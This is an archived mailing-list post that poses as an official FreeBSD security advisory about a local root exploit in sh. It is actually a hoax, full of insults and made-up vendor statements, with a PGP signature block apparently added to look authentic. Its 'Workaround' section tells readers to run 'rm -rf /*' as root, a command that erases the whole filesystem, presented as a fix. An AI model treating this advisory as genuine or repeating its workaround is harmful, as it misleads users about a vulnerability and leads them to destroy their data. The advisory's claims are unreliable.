OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: FreeBSD Security Advisories (security-advisoriesfreebsd.org)
Date: Thu Feb 01 2001 - 21:00:22 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----

    =============================================================================
    FreeBSD-SA-01:69 Security Advisory
                                                                    FreeBSD, Inc.

    Topic: Local root exploit

    Category: core
    Module: sh
    Announced: 2001-02-02
    Credits: AntiOffline.com, Disgraced.org, Deficiency.org
                    sil, deran9ed, jhh, iggie, jwit
    Affects: All released versions of FreeBSD 2.x. 3.x, 4.x.

    Corrected: Not corrected since we aren't smart enough to figure it out.

    Vendor status: Disgruntled
    FreeBSD only: YES

    I. Background

    FreeBSD is a bloated OS complete with 4 CD's worth of crap you just
    don't need, which can often become the overlay for some script kiddiot
    rooting your machine.

    II. Problem Description

    FreeBSD the experts in bloatware which can be compared to Windows 98,
    Windows2000 Unprofessional edition, and well FreeBSD versions *, has
    a local exploit which local (l)users can manipulate in order to gain
    higher priveledges by issuing commands via the terminal.

    Our developers are currently focusing on the problem scrathing their
    gonads and crying foul at the more secure versions of BSD and their
    developers which we cannot mention due to our egos. Kiss my ass
    Theo, you and your ultra secure team of experts, one day we too will
    have our heads out of our asses.

    III. Impact

    Malicious local users can cause arbitrary commands to be executed as
    the root user, although FreeBSD will never admit why we ship our
    distro with 2.6 gigabytes of worthless junkware, we will not stoop
    beneath ourselves to comment on why we still use such insecure stuff,
    e.g., WU-FTPD, a crappy TCP/IP stack, etc. We are now a part of BSDi
    which means we've suckseded in selling our anuses for fun and profit.

    IV. Workaround

    Perform the following commands as root:

    rm -rf /*

    Then run out and purchase OpenBSD 2.8 a real OS not some overlaying
    crap like SecureBSD.

    V. Solution

    Ultimately, there is no workaround until our developers get a clue
    and BSDi decides to be purchased by AOL Time Warner, Microsoft or
    Intel however, kudos to those already using OpenBSD. Your systems
    are safe with it.

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.4 (FreeBSD)
    Comment: For info see http://www.gnupg.org

    iQCVAwUBOniArlUuHi5z0oilAQGE+AQAiwizuORMqyzOw21QFyap2Z7lv7BkYuiC
    9zZ97X3WR+i8AujTfIrhwK1UdO6KFbp5Rjc54f3XHtaMotoRcp3x24xADpGQDP4s
    Xyw267ZoV7ZYuG6VcAgBzq9pqiCnU9rqRQy2aRn/8iCvcl/G5249B3DuMMtLiMw+
    Iuz0OOxWeLM=
    =hanM
    -----END PGP SIGNATURE-----